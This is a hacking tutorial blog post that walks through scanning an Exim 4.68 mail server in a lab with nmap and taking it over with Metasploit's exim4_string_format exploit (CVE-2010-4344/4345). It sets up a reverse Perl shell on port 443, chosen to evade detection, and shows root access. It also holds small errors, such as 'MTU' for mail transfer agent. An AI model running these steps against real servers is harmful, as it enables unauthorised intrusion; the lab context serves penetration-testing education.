Welcome back, my aspiring cyberwarriors!
Email is one of the most important services and protocols in our daily digital life. Without it, most of us would be non-functional. Despite this criticality, many vulnerabilities still exist in these systems.
The key protocol for email is SMTP or Simple Mail Transfer Protocol running, by default, on port 25. This protocol handles delivery of email between domains. Either IMAP or POP3 is used by the email client. For more on the SMTP protocol, check out my series, Network Basics for Hackers.
The software responsible for moving email between SMTP servers is referred to as the Mail Transfer Unit or MTU. There are numerous MTU's in Linux including, Sendmail, Postfix, and Exam. Although Sendmail has been around the longest, Exim has become the dominant MTU with over 50% of all email servers on the Internet. As a result, the ability to exploit exim will yield the largest number of compromised email servers.
In this tutorial, we will examine the reconnaissance and hacking of an Exim SMTP server
Step #1: Fire Up Kali
The first step, of course, is to fire up Kali or any attack Linux system with Metasploit and nmap as a minimum.
Now open a terminal. To begin, we will use nmap to do reconnaissance on the SMTP server. For more on nmap, checkout my tutorial here.
kali > nmap -sT -A 192.168.56.103 -p 25
As we can see above, nmap has identified an exim server on port 25. In addition, it has identified it as version 4.68 and detailed the commands that it accepts (AUTH, HELO, EHLO, etc)
Step #2: Using nmap Scripts (NSE) to Harvest More Data on the Exim Server
As we know, nmap has over 600 scripts that expand the capabilities of this excellent and essential tool (for more on nmap scripts click here). If we use the --script switch combined with the script category such as "smtp" with the wildcard *, we can activate nmap to try all of the nmap scripts in the smtp category such as;
kali > --script=smtp-* 192.168.56.103 -p 25
As you can see above, the nmap scripts have revealed quite a bit about this SMTP server including;
the commands it supports
user names
potential vulnerabilities
Now, with this information we are ready progress to Metasploit for exploitation.
Step #3: Start Metasploit
Now start up your Metasploit Framework.
kali > msfconsole
We know the server is exim and the nmap script relayed that it may be vulnerable to CVE-2010-4344 and CVE-2010-4345. Let's see whether we have an exploit in Metasploit to compromise this server. We can use the search command with the type of module and a keyword such as "ëxim".
msf5> search type:exploit exim
It appears that there are 6 exploit against exim servers and #4 appears to be the one we need (its a string format "exploit" and it's dated 2010). Let's load it into our framework and test to see whether it works.
msf5 > use exploit/unix/smtp/exim4_string_format
Now that we have it loaded, let's get more information on this exploit.
msf5> info
As we can see in the "Description" section of the info display, this exploit is a heap buffer overflow for versions of exim before version 4.69. In addition, we note at the bottom that this exploit will automatically execute a privilege escalation exploit (CVE-2010-4345) to give us root privileges. Perfect!
Step #4: Set the Exploit Parameters
Before attempt the exploit, we need to set the key parameters, RHOSTS, PAYLOAD, LHOST, and LPORT.
msf5> set RHOSTS 192.168.56.103
We will now need a payload.
msf5> set PAYLOAD cmd/unix/reverse_perl
This payload, if successful, will give us a command shell on the target server. Note that it is a Perl payload. As most every UNIX/Linux server has a Perl interpreter installed by default, if our exploit works, this Perl-based payload should work. Also note that it is a "reverse" shell. This meaning that it will call back to our system.
Now, let's just set the LHOST (us) and the port we want to communicate on. We can choose any port, but by using port 443, the firewall is likely to be open for HTTPS traffic and our communication will likely be obscured by other traffic on that port, making it less likely to be detected
msf5> set LHOST 192.168.56.101
msf5 > set LPORT 443
Finally, lets attempt to compromise this email server. simply enter exploit.
msf5> exploit
As you can see, Metasploit has opened a command shell on the server!
Interestingly, there is no command prompt like when we compromise a Windows system or use a meterpreter payload. We simply get a blank line.
Don't be discouraged. You can now simply enter Linux commands at the blank line and have them executed on the server!
First, let's check to see what user we are. We can execute either id or whoami.
As you can see, the system responded with uid=0 or root and when I entered 'whoami´, it confirmed we are root.
Next, let's check to see where we are in the Linux file system (pwd) and the version of the server (uname -a).
Summary
Email servers are among the most critical elements of our digital ecosystems. Their compromise by malicious actors can leave us without a key communication medium, or worse, have emails sent out from our identity that we did not send or authorize!